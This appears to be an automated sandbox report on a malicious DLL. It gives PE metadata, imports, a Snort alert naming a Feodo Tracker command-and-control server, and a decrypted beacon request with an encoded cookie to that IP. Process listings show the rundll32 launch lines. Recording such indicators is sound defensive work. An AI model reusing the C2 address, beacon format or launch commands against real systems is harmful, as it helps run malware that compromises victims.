                                                                                                      • [RES] VS2005 build 50727
                                                                                                      • [ C ] VS2005 build 50727
                                                                                                      • [EXP] VS2005 build 50727
                                                                                                      • [C++] VS2005 build 50727
                                                                                                      • [ASM] VS2005 build 50727
                                                                                                      • [LNK] VS2005 build 50727

                                                                                                      Data Directories

                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x708900x4e.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x6dec80xf0.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x9c0000x9af8.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xa60000x767c.reloc
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x635580x40.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x580000x7d0.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x6de400x40.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                      Sections

                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x10000x566b70x57000False0.574984846444data6.6363911364IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                      .rdata0x580000x188de0x19000False0.30236328125data4.88012998463IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .data0x710000x2a2540x27000False0.931434044471data7.84888321435IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                      .rsrc0x9c0000x9af80xa000False0.241723632813data3.85640321845IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .reloc0xa60000xbd480xc000False0.347106933594data4.87718770475IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                      Resources

                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                      RT_CURSOR0x9d7800x134dataEnglishUnited States
                                                                                                      RT_CURSOR0x9d8b40xb4dataEnglishUnited States
                                                                                                      RT_CURSOR0x9d9680x134dataEnglishUnited States
                                                                                                      RT_CURSOR0x9da9c0xb4dataEnglishUnited States
                                                                                                      RT_CURSOR0x9db500x134AmigaOS bitmap fontEnglishUnited States
                                                                                                      RT_CURSOR0x9dc840xb4dataEnglishUnited States
                                                                                                      RT_CURSOR0x9dd380x134AmigaOS bitmap fontEnglishUnited States
                                                                                                      RT_CURSOR0x9de6c0xb4dataEnglishUnited States
                                                                                                      RT_CURSOR0x9df200x134AmigaOS bitmap fontEnglishUnited States
                                                                                                      RT_CURSOR0x9e0540xb4dataEnglishUnited States
                                                                                                      RT_CURSOR0x9e1080x200AmigaOS bitmap fontEnglishUnited States
                                                                                                      RT_CURSOR0x9e3080xb4dataEnglishUnited States
                                                                                                      RT_CURSOR0x9e3bc0x200AmigaOS bitmap fontEnglishUnited States
                                                                                                      RT_CURSOR0x9e5bc0xb4dataEnglishUnited States
                                                                                                      RT_CURSOR0x9e6700x200AmigaOS bitmap fontEnglishUnited States
                                                                                                      RT_CURSOR0x9e8700xb4dataEnglishUnited States
                                                                                                      RT_CURSOR0x9e9240x200AmigaOS bitmap fontEnglishUnited States
                                                                                                      RT_CURSOR0x9eb240xb4dataEnglishUnited States
                                                                                                      RT_CURSOR0x9ebd80x134AmigaOS bitmap fontEnglishUnited States
                                                                                                      RT_CURSOR0x9ed0c0xb4dataEnglishUnited States
                                                                                                      RT_CURSOR0x9edc00x134dataEnglishUnited States
                                                                                                      RT_CURSOR0x9eef40xb4dataEnglishUnited States
                                                                                                      RT_CURSOR0x9efa80x134AmigaOS bitmap fontEnglishUnited States
                                                                                                      RT_CURSOR0x9f0dc0x134dataEnglishUnited States
                                                                                                      RT_CURSOR0x9f2100x134dataEnglishUnited States
                                                                                                      RT_CURSOR0x9f3440x134dataEnglishUnited States
                                                                                                      RT_CURSOR0x9f4780x134dataEnglishUnited States
                                                                                                      RT_CURSOR0x9f5ac0x134dataEnglishUnited States
                                                                                                      RT_CURSOR0x9f6e00x134dataEnglishUnited States
                                                                                                      RT_CURSOR0x9f8140x134dataEnglishUnited States
                                                                                                      RT_CURSOR0x9f9480x134dataEnglishUnited States
                                                                                                      RT_CURSOR0x9fa7c0x134dataEnglishUnited States
                                                                                                      RT_CURSOR0x9fbb00x134AmigaOS bitmap fontEnglishUnited States
                                                                                                      RT_CURSOR0x9fce40x134dataEnglishUnited States
                                                                                                      RT_CURSOR0x9fe180x134dataEnglishUnited States
                                                                                                      RT_CURSOR0x9ff4c0x134dataEnglishUnited States
                                                                                                      RT_CURSOR0xa00800x134dataEnglishUnited States
                                                                                                      RT_CURSOR0xa01b40xb4dataEnglishUnited States
                                                                                                      RT_BITMAP0xa02680x4a0dataEnglishUnited States
                                                                                                      RT_BITMAP0xa07080x2c0dataEnglishUnited States
                                                                                                      RT_BITMAP0xa09c80xb8dataEnglishUnited States
                                                                                                      RT_BITMAP0xa0a800x144dataEnglishUnited States
                                                                                                      RT_ICON0xa0bc40x2e8dataEnglishUnited States
                                                                                                      RT_ICON0xa0eac0x2e8dataEnglishUnited States
                                                                                                      RT_MENU0xa11940x15cdataEnglishUnited States
                                                                                                      RT_MENU0xa12f00x42edataEnglishUnited States
                                                                                                      RT_MENU0xa17200x25cdataEnglishUnited States
                                                                                                      RT_MENU0xa197c0x478dataEnglishUnited States
                                                                                                      RT_DIALOG0xa1df40x1dadataEnglishUnited States
                                                                                                      RT_DIALOG0xa1fd00x3eadataEnglishUnited States
                                                                                                      RT_DIALOG0xa23bc0x250dataEnglishUnited States
                                                                                                      RT_DIALOG0xa260c0xd2dataEnglishUnited States
                                                                                                      RT_DIALOG0xa26e00xe8dataEnglishUnited States
                                                                                                      RT_DIALOG0xa27c80x1a2dataEnglishUnited States
                                                                                                      RT_DIALOG0xa296c0x15adataEnglishUnited States
                                                                                                      RT_DIALOG0xa2ac80x34dataEnglishUnited States
                                                                                                      RT_STRING0xa2afc0x102dataEnglishUnited States
                                                                                                      RT_STRING0xa2c000x124dataEnglishUnited States
                                                                                                      RT_STRING0xa2d240xd8dataEnglishUnited States
                                                                                                      RT_STRING0xa2dfc0x7cdataEnglishUnited States
                                                                                                      RT_STRING0xa2e780xaadataEnglishUnited States
                                                                                                      RT_STRING0xa2f240x8cdataEnglishUnited States
                                                                                                      RT_STRING0xa2fb00xa2dataEnglishUnited States
                                                                                                      RT_STRING0xa30540x1d2dataEnglishUnited States
                                                                                                      RT_STRING0xa32280xb0dataEnglishUnited States
                                                                                                      RT_STRING0xa32d80x23edataEnglishUnited States
                                                                                                      RT_STRING0xa35180x100dataEnglishUnited States
                                                                                                      RT_STRING0xa36180x220dataEnglishUnited States
                                                                                                      RT_STRING0xa38380x46dataEnglishUnited States
                                                                                                      RT_STRING0xa38800x86dataEnglishUnited States
                                                                                                      RT_STRING0xa39080x1acdataEnglishUnited States
                                                                                                      RT_STRING0xa3ab40xaedataEnglishUnited States
                                                                                                      RT_STRING0xa3b640xcadataEnglishUnited States
                                                                                                      RT_STRING0xa3c300x2adataEnglishUnited States
                                                                                                      RT_STRING0xa3c5c0x192dataEnglishUnited States
                                                                                                      RT_STRING0xa3df00x124dataEnglishUnited States
                                                                                                      RT_STRING0xa3f140x5edataEnglishUnited States
                                                                                                      RT_STRING0xa3f740x4adataEnglishUnited States
                                                                                                      RT_STRING0xa3fc00x4e2dataEnglishUnited States
                                                                                                      RT_STRING0xa44a40x31adataEnglishUnited States
                                                                                                      RT_STRING0xa47c00x2dcdataEnglishUnited States
                                                                                                      RT_STRING0xa4a9c0x8adataEnglishUnited States
                                                                                                      RT_STRING0xa4b280x32edataEnglishUnited States
                                                                                                      RT_STRING0xa4e580xdedataEnglishUnited States
                                                                                                      RT_STRING0xa4f380x4c4dataEnglishUnited States
                                                                                                      RT_STRING0xa53fc0x264dataEnglishUnited States
                                                                                                      RT_STRING0xa56600x2cdataEnglishUnited States
                                                                                                      RT_STRING0xa568c0x42dataEnglishUnited States
                                                                                                      RT_ACCELERATOR0xa56d00x78dataEnglishUnited States
                                                                                                      RT_ACCELERATOR0xa57480x50dataEnglishUnited States
                                                                                                      RT_ACCELERATOR0xa57980x18dataEnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa57b00x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa57d40x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa57f80x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa581c0x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa58400x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa58640x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa58880x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa58ac0x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa58d00x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa58f40x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa59180x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa593c0x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa59600x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa59740x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa59880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa599c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa59b00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa59c40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa59d80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa59ec0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa5a000x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa5a140x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa5a280x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa5a3c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa5a500x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa5a640x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_ICON0xa5a780x14dataEnglishUnited States
                                                                                                      RT_GROUP_ICON0xa5a8c0x14dataEnglishUnited States
                                                                                                      RT_MANIFEST0xa5aa00x56ASCII text, with CRLF line terminatorsEnglishUnited States

                                                                                                      Imports

                                                                                                      DLLImport
                                                                                                      KERNEL32.dllRaiseException, HeapSize, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapDestroy, HeapCreate, VirtualFree, Sleep, GetStdHandle, GetACP, GetTimeZoneInformation, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, IsValidCodePage, RtlUnwind, GetStringTypeW, SetHandleCount, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, LCMapStringA, LCMapStringW, GetConsoleCP, GetConsoleMode, GetLocaleInfoW, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetEnvironmentVariableA, GetProcessHeap, GetCommandLineA, GetDateFormatA, GetTimeFormatA, GetSystemTimeAsFileTime, HeapReAlloc, VirtualQuery, GetSystemInfo, VirtualAlloc, VirtualProtect, HeapAlloc, HeapFree, GetCurrentDirectoryA, GetShortPathNameA, GetVolumeInformationA, GetCurrentProcess, DuplicateHandle, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, DeleteFileA, MoveFileA, GetProfileIntA, GetOEMCP, GetCPInfo, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, GlobalHandle, GlobalReAlloc, TlsGetValue, GetThreadLocale, GlobalFlags, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSection, GetCurrentThread, ConvertDefaultLocale, EnumResourceLanguagesA, GetLocaleInfoA, GetFileSize, CreateFileA, CloseHandle, SystemTimeToFileTime, LocalFileTimeToFileTime, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToSystemTime, GetModuleFileNameA, GetDiskFreeSpaceA, GetFullPathNameA, GetTempFileNameA, GetFileTime, SetFileTime, GetFileAttributesA, LocalAlloc, LocalLock, LocalUnlock, GetPrivateProfileStringA, WritePrivateProfileStringA, GetPrivateProfileIntA, lstrcmpA, InterlockedIncrement, GetCurrentProcessId, GetCurrentThreadId, GlobalGetAtomNameA, GlobalAddAtomA, GlobalFindAtomA, GlobalDeleteAtom, lstrcmpW, GetVersionExA, CopyFileA, GlobalSize, GlobalAlloc, FormatMessageA, LocalFree, FreeLibrary, InterlockedDecrement, GlobalFree, FreeResource, GlobalLock, GlobalUnlock, GetModuleHandleA, GetProcAddress, SetLastError, GetTickCount, MulDiv, lstrcpynA, LoadLibraryA, ExitProcess, GetVersion, CompareStringA, LockResource, lstrcmpiA, GetLastError, InterlockedExchange, GetStringTypeExA, lstrlenW, MultiByteToWideChar, CompareStringW, SizeofResource, WideCharToMultiByte, LoadResource, lstrlenA, FindResourceA, GlobalMemoryStatus, GetStringTypeA
                                                                                                      USER32.dllSetCapture, GetDCEx, FindWindowA, SetWindowRgn, DestroyIcon, LockWindowUpdate, ShowOwnedPopups, PostQuitMessage, LoadCursorA, DestroyCursor, GetTabbedTextExtentA, MessageBeep, IsClipboardFormatAvailable, RedrawWindow, TranslateMDISysAccel, DrawMenuBar, DefMDIChildProcA, DefFrameProcA, SetParent, WindowFromDC, InSendMessage, ClipCursor, GetCursorPos, PostThreadMessageA, CreateMenu, CopyAcceleratorTableA, UnpackDDElParam, ReuseDDElParam, LoadMenuA, DestroyMenu, GetWindowThreadProcessId, SetCursor, ReleaseCapture, InsertMenuItemA, CreatePopupMenu, SetMenu, TranslateAcceleratorA, InvalidateRect, SetRectEmpty, ShowWindow, IsDialogMessageA, SetDlgItemTextA, RegisterWindowMessageA, SendDlgItemMessageA, WinHelpA, IsChild, GetCapture, SetWindowsHookExA, CallNextHookEx, GetClassLongA, GetClassNameA, SetPropA, GetPropA, RemovePropA, SetFocus, GetWindowTextLengthA, GetWindowTextA, GetForegroundWindow, GetLastActivePopup, DispatchMessageA, DeleteMenu, EndDeferWindowPos, GetTopWindow, GetMessageTime, GetMessagePos, PeekMessageA, MapWindowPoints, ScrollWindow, TrackPopupMenu, GetKeyState, SetScrollRange, GetScrollRange, SetScrollPos, GetScrollPos, SetForegroundWindow, ShowScrollBar, GetMenu, PostMessageA, GetClassInfoExA, GetClassInfoA, RegisterClassA, AdjustWindowRectEx, EqualRect, DeferWindowPos, CopyRect, GetScrollInfo, SetScrollInfo, PtInRect, SetWindowPlacement, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, OffsetRect, IntersectRect, SystemParametersInfoA, GetWindowPlacement, GetWindow, GetMenuStringA, AppendMenuA, GetMenuItemID, InsertMenuA, GetMenuItemCount, GetSubMenu, RemoveMenu, UnhookWindowsHookEx, GetDesktopWindow, GetActiveWindow, SetActiveWindow, CreateDialogIndirectParamA, IsWindow, GetWindowLongA, EnableWindow, GetSystemMetrics, SetRect, LoadAcceleratorsA, GetDlgItem, IsWindowEnabled, GetNextDlgTabItem, EndDialog, GetSysColor, EndPaint, BeginPaint, GetWindowDC, ClientToScreen, ScreenToClient, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, SetMenuItemBitmaps, WindowFromPoint, GetMenuItemInfoA, UnregisterClassA, GetSysColorBrush, RegisterClipboardFormatA, GetMessageA, TranslateMessage, BeginDeferWindowPos, ValidateRect, GetClientRect, DrawIcon, wsprintfA, CharUpperA, LoadIconA, FillRect, MessageBoxA, IsZoomed, SendMessageA, IsWindowVisible, IsRectEmpty, InflateRect, UpdateWindow, SetWindowTextA, SetWindowPos, ReleaseDC, CreateWindowExA, BringWindowToTop, SetWindowLongA, GetDC, GetParent, GetFocus, KillTimer, GetWindowRect, SetTimer, DestroyWindow, IsIconic, CheckMenuItem, EnableMenuItem, GetMenuState, ModifyMenuA, LoadBitmapA, GetMenuCheckMarkDimensions
                                                                                                      GDI32.dllSetWindowExtEx, ScaleWindowExtEx, GetCurrentPositionEx, DeleteDC, CreatePatternBrush, CreatePen, CreateSolidBrush, CopyMetaFileA, CreateDCA, GetCharWidthA, CreateFontA, StretchDIBits, SetBrushOrgEx, CreateMetaFileA, SetWindowOrgEx, DeleteMetaFile, GetTextExtentPoint32A, DPtoLP, CreateRectRgnIndirect, SetRectRgn, CombineRgn, GetMapMode, PatBlt, GetViewportOrgEx, GetBkColor, UnrealizeObject, GetTextAlign, GetWindowOrgEx, StartPage, EndPage, SetAbortProc, AbortDoc, EndDoc, CreateEllipticRgn, LPtoDP, Ellipse, GetNearestColor, GetBkMode, GetPolyFillMode, GetROP2, GetStretchBltMode, GetTextColor, GetTextFaceA, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, SelectObject, Escape, ExtTextOutA, TextOutA, RectVisible, PtVisible, StartDocA, GetPixel, BitBlt, CloseMetaFile, GetStockObject, GetViewportExtEx, CreateRectRgn, SelectClipRgn, DeleteObject, SetTextAlign, MoveToEx, LineTo, IntersectClipRect, ExcludeClipRect, GetClipBox, SetMapMode, SetTextColor, SetStretchBltMode, SetROP2, SetPolyFillMode, SetBkMode, SetBkColor, RestoreDC, SaveDC, CreateBitmap, GetDeviceCaps, CreateFontIndirectA, GetObjectA, GetTextMetricsA, StretchBlt, CreateCompatibleDC, CreateCompatibleBitmap, Rectangle, GetWindowExtEx
                                                                                                      comdlg32.dllGetFileTitleA
                                                                                                      WINSPOOL.DRVGetJobA, DocumentPropertiesA, OpenPrinterA, ClosePrinter
                                                                                                      ADVAPI32.dllRegQueryValueA, RegEnumKeyA, GetFileSecurityA, SetFileSecurityA, RegDeleteKeyA, RegDeleteValueA, RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegCreateKeyExA, RegOpenKeyA, RegSetValueA, RegCloseKey, RegCreateKeyA
                                                                                                      SHELL32.dllDragFinish, DragQueryFileA, ExtractIconA, SHGetFileInfoA, DragAcceptFiles
                                                                                                      SHLWAPI.dllPathRemoveExtensionA, PathFindFileNameA, PathStripToRootA, PathFindExtensionA, PathIsUNCA
                                                                                                      oledlg.dll
                                                                                                      ole32.dllOleIsCurrentClipboard, OleFlushClipboard, CoRegisterClassObject, CoRevokeClassObject, OleUninitialize, CoFreeUnusedLibraries, OleInitialize, OleLockRunning, CoRegisterMessageFilter, OleSetClipboard, CreateFileMoniker, StgCreateDocfile, CoDisconnectObject, CreateGenericComposite, CreateItemMoniker, CreateStreamOnHGlobal, OleSaveToStream, WriteClassStm, CreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, CreateDataAdviseHolder, OleRegGetMiscStatus, CreateOleAdviseHolder, OleRegEnumVerbs, OleDestroyMenuDescriptor, OleCreateMenuDescriptor, IsAccelerator, OleTranslateAccelerator, OleDuplicateData, CoTaskMemAlloc, ReleaseStgMedium, CreateBindCtx, StringFromCLSID, OleRegGetUserType, WriteClassStg, CoTaskMemFree, CoLockObjectExternal, OleRun, GetRunningObjectTable, OleIsRunning, StgIsStorageFile, StgOpenStorage
                                                                                                      OLEAUT32.dllSysStringLen, SysStringByteLen, VariantClear, VariantChangeType, VariantInit, SysAllocStringLen, SysFreeString

                                                                                                      Exports

                                                                                                      NameOrdinalAddress
                                                                                                      Control_RunDLL10x10003680

                                                                                                      Possible Origin

                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                      EnglishUnited States

                                                                                                      Network Behavior

                                                                                                      Snort IDS Alerts

                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                      12/01/21-16:12:03.931139TCP2404336ET CNC Feodo Tracker Reported CnC Server TCP group 1949775443192.168.2.451.178.61.60

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Dec 1, 2021 16:12:03.931138992 CET49775443192.168.2.451.178.61.60
                                                                                                      Dec 1, 2021 16:12:03.931215048 CET4434977551.178.61.60192.168.2.4
                                                                                                      Dec 1, 2021 16:12:03.931405067 CET49775443192.168.2.451.178.61.60
                                                                                                      Dec 1, 2021 16:12:04.000613928 CET49775443192.168.2.451.178.61.60
                                                                                                      Dec 1, 2021 16:12:04.000655890 CET4434977551.178.61.60192.168.2.4
                                                                                                      Dec 1, 2021 16:12:04.110825062 CET4434977551.178.61.60192.168.2.4
                                                                                                      Dec 1, 2021 16:12:04.110970974 CET49775443192.168.2.451.178.61.60
                                                                                                      Dec 1, 2021 16:12:04.498553991 CET49775443192.168.2.451.178.61.60
                                                                                                      Dec 1, 2021 16:12:04.498589993 CET4434977551.178.61.60192.168.2.4
                                                                                                      Dec 1, 2021 16:12:04.499031067 CET4434977551.178.61.60192.168.2.4
                                                                                                      Dec 1, 2021 16:12:04.500966072 CET49775443192.168.2.451.178.61.60
                                                                                                      Dec 1, 2021 16:12:04.530108929 CET49775443192.168.2.451.178.61.60
                                                                                                      Dec 1, 2021 16:12:04.572871923 CET4434977551.178.61.60192.168.2.4
                                                                                                      Dec 1, 2021 16:12:05.137804985 CET4434977551.178.61.60192.168.2.4
                                                                                                      Dec 1, 2021 16:12:05.137996912 CET4434977551.178.61.60192.168.2.4
                                                                                                      Dec 1, 2021 16:12:05.138084888 CET49775443192.168.2.451.178.61.60
                                                                                                      Dec 1, 2021 16:12:05.138143063 CET49775443192.168.2.451.178.61.60
                                                                                                      Dec 1, 2021 16:12:05.140539885 CET49775443192.168.2.451.178.61.60
                                                                                                      Dec 1, 2021 16:12:05.140568018 CET4434977551.178.61.60192.168.2.4

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • 51.178.61.60

                                                                                                      HTTPS Proxied Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      0192.168.2.44977551.178.61.60443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-12-01 15:12:04 UTC0OUTGET /ZKzoaCRaSGPOqJVHjhZJzdCfaeZvESlfQfwHxNYMOhGmjZbKSRXfZNvJ HTTP/1.1
                                                                                                      Cookie: BbabBTNqIR=qrh4znIW0vRoZUgVJJVgzfQvY9C+RpRussFCR/fGFdtMBlPVybXrZsLF92dUNSOaN7UtApPRkIXlq1+7rNMFKl/GD+kwN0+UKJ1vSTU/v1LmGzXvNL9Y6Ncf4sehP3YL6oaRsTpSuU6YzoarwBbK29kvoAsGOYRv6Xj3viHnIeOCY6VwhklOKsvWD+GGQWp/+KzcLqZXdf6vX1pw51ydx7BZAIYsZ4oO5HPx+C0OX/W7prasTQF+SxpB+l8kw9kHpKuLSE3MN5eruU/U1ZyDN8wwOUnkB9ePec54mFaBjmfD1QEzkF2yYIRzHwr7O5Mz0xHblcofjcNex7IClSGUVtOK3eIw
                                                                                                      Host: 51.178.61.60
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-12-01 15:12:05 UTC0INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Wed, 01 Dec 2021 15:12:05 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      2021-12-01 15:12:05 UTC0INData Raw: 33 30 31 0d 0a 20 9b c5 28 57 37 9f 3b 96 c5 45 95 6a a2 15 b8 f4 41 76 33 3b ae 0c 15 49 0c 36 5e b0 1c a1 f1 ce c4 2c 55 d6 d6 fc 1c 98 3c 7e 88 82 5f 6c 2f 4e e2 0f 21 bc e0 f2 81 2a fb 54 ba cc bf 3f fc 78 46 1b 08 69 e2 c9 45 ab 80 93 45 3a b1 42 b0 fc e3 4e d5 c5 bf ab aa a3 1a d4 4c 37 2b d5 91 d5 66 47 03 03 c8 e7 99 d1 79 ba 02 78 00 80 d4 41 66 62 7c e6 70 bd 5a 59 53 09 03 8c 61 da bc e5 49 9b 2e 3c e7 d1 da 37 14 bd 10 da 06 40 80 f1 bb 3a c8 df bd de 88 04 fe 52 5b 0f 7b b3 06 81 84 b9 3d fe 81 b3 67 8a 1a 85 d6 95 9c 9d 82 a0 e1 92 a6 3d f4 20 6e 13 cc 5e ef d7 83 b6 fd 9a 50 74 28 1e 96 17 e7 ac 6f 22 2f c0 1c f0 93 f3 a9 16 9f ec 0c 20 7a 49 68 f1 19 c7 59 c3 a4 f5 cf 06 c8 55 0c 84 b7 3a ce 7b f4 a7 73 e2 8b ce df b1 6f a7 82 10 0a 01 64
                                                                                                      Data Ascii: 301 (W7;EjAv3;I6^,U<~_l/N!*T?xFiEE:BNL7+fGyxAfb|pZYSaI.<7@:R[{=g= n^Pt(o"/ zIhYU:{sod


                                                                                                      Code Manipulations

                                                                                                      Statistics

                                                                                                      CPU Usage

                                                                                                      Click to jump to process

                                                                                                      Memory Usage

                                                                                                      Click to jump to process

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      Analysis Process: loaddll32.exe PID: 6816 Parent PID: 5704

                                                                                                      General

                                                                                                      Start time:16:11:53
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\System32\loaddll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:loaddll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll"
                                                                                                      Imagebase:0xd30000
                                                                                                      File size:893440 bytes
                                                                                                      MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: cmd.exe PID: 6796 Parent PID: 6816

                                                                                                      General

                                                                                                      Start time:16:11:53
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1
                                                                                                      Imagebase:0x11d0000
                                                                                                      File size:232960 bytes
                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: svchost.exe PID: 6836 Parent PID: 568

                                                                                                      General

                                                                                                      Start time:16:11:54
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff6eb840000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: rundll32.exe PID: 6792 Parent PID: 6816

                                                                                                      General

                                                                                                      Start time:16:11:54
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll,Control_RunDLL
                                                                                                      Imagebase:0x10000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
